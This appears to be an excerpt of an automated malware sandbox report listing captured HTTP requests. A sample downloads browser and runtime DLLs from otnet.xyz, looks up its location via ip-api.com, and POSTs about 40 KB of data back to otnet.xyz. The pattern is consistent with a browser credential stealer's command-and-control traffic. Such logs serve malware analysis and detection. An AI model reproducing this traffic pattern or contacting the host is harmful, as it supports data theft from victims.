- "data": "GET /freebl3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://otnet.xyz/freebl3.dll?ddosprotected=1",
- "user-agent": "",
- "method": "GET",
- "host": "otnet.xyz",
- "version": "1.1",
- "path": "/freebl3.dll?ddosprotected=1",
- "data": "GET /freebl3.dll?ddosprotected=1 HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://otnet.xyz/mozglue.dll",
- "user-agent": "",
- "method": "GET",
- "host": "otnet.xyz",
- "version": "1.1",
- "path": "/mozglue.dll",
- "data": "GET /mozglue.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://otnet.xyz/msvcp140.dll",
- "user-agent": "",
- "method": "GET",
- "host": "otnet.xyz",
- "version": "1.1",
- "path": "/msvcp140.dll",
- "data": "GET /msvcp140.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://otnet.xyz/nss3.dll",
- "user-agent": "",
- "method": "GET",
- "host": "otnet.xyz",
- "version": "1.1",
- "path": "/nss3.dll",
- "data": "GET /nss3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://otnet.xyz/softokn3.dll",
- "user-agent": "",
- "method": "GET",
- "host": "otnet.xyz",
- "version": "1.1",
- "path": "/softokn3.dll",
- "data": "GET /softokn3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://otnet.xyz/vcruntime140.dll",
- "user-agent": "",
- "method": "GET",
- "host": "otnet.xyz",
- "version": "1.1",
- "path": "/vcruntime140.dll",
- "data": "GET /vcruntime140.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "--1BEF0A57BE110FD467A--\r\n",
- "uri": "http://ip-api.com/line/",
- "user-agent": "",
- "method": "POST",
- "host": "ip-api.com",
- "version": "1.1",
- "path": "/line/",
- "data": "POST /line/ HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 25\r\nHost: ip-api.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n--1BEF0A57BE110FD467A--\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://otnet.xyz/",
- "user-agent": "",
- "method": "POST",
- "host": "otnet.xyz",
- "version": "1.1",
- "path": "/",
- "data": "POST / HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 40736\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
- "port": 80
- * Network Communication - SMTP:
- * Network Communication - Hosts:
- * Network Communication - IRC: